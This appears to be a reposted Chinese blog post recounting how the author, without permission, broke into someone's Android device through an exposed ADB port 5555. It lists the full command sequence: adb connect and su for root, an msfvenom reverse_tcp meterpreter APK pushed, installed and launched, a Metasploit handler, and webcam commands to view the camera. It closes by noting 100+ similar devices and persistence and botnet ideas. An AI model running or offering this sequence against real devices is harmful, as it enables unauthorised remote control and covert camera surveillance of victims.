[滲透測試]記一次5555端口滲透實戰


[滲透測試]記一次5555端口滲透實戰

還是在大一的時候,看到學長把某個設備搞了下來,還調用了上面的攝像頭,覺得很酷(學長yyds!)。
於是偷偷搞來該設備的ip地址。使用Nmap掃了一下,發現只開啟了5555端口,
當時還沒有意識到什么(發生了腎么事情了),於是又使用了Openvas(現在改名GVM)掃了一下,
哦~,好像..,等等這堆英文是什么東西,百度一下看看...這.(心跳不由得加快了起來)
  • 原來它的遠程調試端口是打開的....不是吧這么草率(很喜歡)

ADB

Android Debug Bridge(安卓調試橋) tools。它就是一個命令行窗口,用於通過電腦端與模擬器或者是設備之間的交互。

開始

  • 安裝好ADB后,找到ADB的命令手冊,終於可以開始了
adb connect ip地址
adb shell
su

直接獲得了root權限... 很開心

但是如何向學長那樣調攝像頭呢?這困擾了我大一很久。一直到后來接觸到了神器MSF

  • 首先創建MSF載荷

    msfvenom -p android/meterpreter/reverse_tcp LHOST=自己的IP地址 LPORT=4444 R > msfad.apk
    

  • 把載荷push到設備里面

    adb push /root/msfa.apk /sdcard/Download/msfad.apk
    

    查看了下,確實傳上去了

  • 到這里,遇到了一個問題,安卓我一點也不懂啊。windows,linux大家都知道怎么通過命令行去執行文件,可是安卓到底怎么去執行文件呢,痛苦面具已戴上。百度走起,,

命令行安裝 安卓apk

  • 首先安裝apk

    adb shell pm install /sdcard/Download/msfad.apk
    

    也可以在shell里面操作直接 下同

    pm install /sdcard/Download/msfad.apk
    

  • 查看一下應用列表

    pm list packages -3
    

    找到的這個是 包名

  • 要想啟動程序的話還需要一個啟動頁Activity

  • 查看應用詳細信息 可以找到這個啟動頁Activity (包含“category.LAUNCHER”的Activity即為啟動頁Activity)

    adb shell dumpsys package com.metasploit.stage
    

  • 設置 MSF

    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 本機IP
    set LPORT 4444(本機監聽端口)
    run
    

  • 啟動程序

    adb shell am start com.metasploit.stage/.MainActivity
    

  • 收到meterpreter

  • 找到meterpreter的命令 調用攝像頭

webcam_list
wecam_stream


  • ok 到此就先告一段落了 嗯 實現了以后心情其實也就這樣吧

    本文章只是用於技術交流,請於24h之內忘記 /滑稽
    

最后

后來對整個網段進行掃描,發現了100多個同樣的設備
其實以現在的角度來看,能利用的還有很多
1.這個設備還控制另外一些攝像頭,或許同樣可以拿下
2.因為開局就送shell,利用方法還有很多,還可以做很多事情。
3.權限維持,C2上線,批量抓雞。這個真沒必要..
整個過程其實還是挺順利的,並沒有遇到什么阻礙,所以難度也降低很多了。運氣挺好
分享2個鏈接

ADB命令
meterpreter后滲透


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM